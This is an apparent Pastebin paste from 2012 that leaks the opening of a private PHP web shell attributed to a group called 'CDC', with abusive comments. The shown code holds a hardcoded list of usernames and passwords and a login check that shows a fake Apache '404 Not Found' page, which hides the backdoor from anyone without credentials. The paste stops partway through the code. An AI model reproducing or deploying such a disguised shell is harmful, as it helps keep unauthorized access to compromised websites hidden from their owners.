Tophat

Private CDC Shell leak'd, fuck you lamer !

Oct 7th, 2012
438
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.14 KB | None | 0 0
  1. <?php
  2. /*
  3. * Fuck you CDC, and your shit lame staff. Information alive and code free !
  4. *
  5. * -! Leaked By Coded32 !-
  6. *
  7. */
  8. $LOGIN_INFORMATION = array(
  9. 'bun'=>'talz',
  10. 'AlepCDC'=>'CDCDF',
  11. 'root'=>'toor',
  12. 'trumpt'=>'nurnatasha',
  13. 'atommota'=>'online11'
  14. );
  15. define('USE_USERNAME',true);
  16. define('TIMEOUT_MINUTES',0);
  17. define('TIMEOUT_CHECK_ACTIVITY',true);
  18. $timeout = (TIMEOUT_MINUTES == 0 ?0 : time() +TIMEOUT_MINUTES * 60);
  19. $dir = $_SERVER['PHP_SELF'];
  20. if(isset($_GET['logout'])) {
  21. setcookie("verify",'',$timeout,'/');
  22. header('Location: '.$dir);
  23. exit();
  24. }
  25. if(!function_exists('showLoginPasswordProtect')) {
  26. function showLoginPasswordProtect($error_msg) {
  27. ;echo '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  28. <html><head>
  29. <title>404 Not Found</title>
  30. </head><body>
  31. ';
  32. echo"<h1>Not Found</h1>";
  33. echo"
  34. <p>The requested URL ".$_SERVER['REQUEST_URI']." was not found on this server.</p>
  35. <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p>
  36. <hr><address>".$_SERVER["SERVER_SOFTWARE"]." Server at ".$_SERVER["HTTP_HOST"] ." Port 80</address>
  37. </body><html>";
  38. ;echo '
Advertisement
Add Comment
Please, Sign In to add comment